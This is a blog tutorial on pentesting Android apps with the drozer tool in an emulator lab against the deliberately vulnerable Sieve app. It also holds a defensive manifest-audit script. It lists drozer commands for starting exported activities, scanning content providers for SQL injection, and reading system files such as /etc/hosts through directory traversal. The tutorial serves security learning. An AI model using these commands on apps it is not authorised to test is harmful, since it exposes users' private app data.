Android Pentest with Drozer

0xLeeBai
Jul 23, 2023


What is Drozer?

Drozer is a free and powerful Android pentest tool used for dynamic analysis during Android application security assessments.

[Windows 10] My lab setup

I perform my Android pentests on my Windows 10 host machine. The following is my setup:

  1. Python v2.7
  2. Drozer v2.4.4
  3. Other dependencies

pip install protobuf
pip install PyOpenssl
pip install twisted
pip install service_identity

  4. Drozer agent v2.3.4 apk
     • Install drozer-agent.apk into the Android emulator
  5. Nox player (Android emulator)
  6. Sieve apk (vulnerable application)

[CMD] Start a drozer session

  1. Open the drozer-agent application inside the Android emulator and toggle it on.

  2. Open CMD on the Windows host machine and run the following to establish communication between drozer and drozer-agent.

adb forward tcp:31415 tcp:31415

  3. Open CMD on the Windows host machine and run the following to start drozer.

drozer console connect

[Drozer] Find the package name of the vulnerable application

run app.package.list -f <string>

[Drozer] Show package information

run app.package.info -a <package_name>

[Drozer] Identify attack surface

run app.package.attacksurface <package_name>
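
The exposure that this module reports at runtime can also be checked from the decoded manifest before an app ships. The script below is an added example, not part of the original post or of drozer; the manifest, the package name com.example.notes and the function names are constructed for illustration. It flags exported components that are not guarded by a permission and reports the debuggable flag.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (decoded XML), not taken from a real application.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <application android:debuggable="true">
    <activity android:name=".Main" android:exported="true"/>
    <activity android:name=".Share">
      <intent-filter><action android:name="android.intent.action.SEND"/></intent-filter>
    </activity>
    <activity android:name=".Settings"/>
    <service android:name=".Sync" android:exported="true"
        android:permission="com.example.notes.SYNC"/>
    <provider android:name=".NoteProvider" android:authorities="com.example.notes.db"
        android:exported="true" android:readPermission="com.example.notes.READ"/>
  </application>
</manifest>"""

def is_exported(elem):
    # An explicit android:exported wins; without it, an intent-filter implies
    # export (the default before Android 12 made the attribute mandatory).
    flag = elem.get(NS + "exported")
    if flag is not None:
        return flag.lower() == "true"
    return elem.find("intent-filter") is not None

def missing_guards(elem):
    # Providers are guarded per direction; other components by android:permission.
    perm = elem.get(NS + "permission")
    if elem.tag != "provider":
        return [] if perm else ["permission"]
    return [d for d in ("readPermission", "writePermission")
            if not (elem.get(NS + d) or perm)]

def audit_manifest(xml_text):
    """Return (debuggable, findings); findings are (tag, name, missing guards)."""
    app = ET.fromstring(xml_text).find("application")
    debuggable = app.get(NS + "debuggable", "false").lower() == "true"
    findings = []
    for elem in app:
        if elem.tag in COMPONENTS and is_exported(elem):
            gaps = missing_guards(elem)
            if gaps:
                findings.append((elem.tag, elem.get(NS + "name"), gaps))
    return debuggable, findings
```

A launcher activity has to be exported, so a finding on it is expected; the entries worth reviewing are the other components and any provider with only one direction guarded.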

[Drozer] Exploit exported activities

List exported activities

run app.activity.info -a <package_name>

Invoke exported activities

run app.activity.start --component <package_name> <exported_activity_name>

[Drozer] Exploit exported content providers

Find accessible content URIs

run scanner.provider.finduris -a <package_name>

SQLi vulnerability

List the accessible content URIs and the SQL injection points found in them.

run scanner.provider.injection -a <package_name>

Display the SQL tables for the package if it is vulnerable to SQLi.

run scanner.provider.sqltables -a <package_name>

[CRUD] query the content.

[CRUD] insert the content.

[CRUD] update the content.

[CRUD] delete the content.

Directory traversal vulnerability

List accessible content URIs that are vulnerable to directory traversal.

run scanner.provider.traversal -a <package_name>

Exploit directory traversal vulnerability.

run app.provider.read <content_uri>../../etc/hosts
run app.provider.read <content_uri>../../proc/cpuinfo
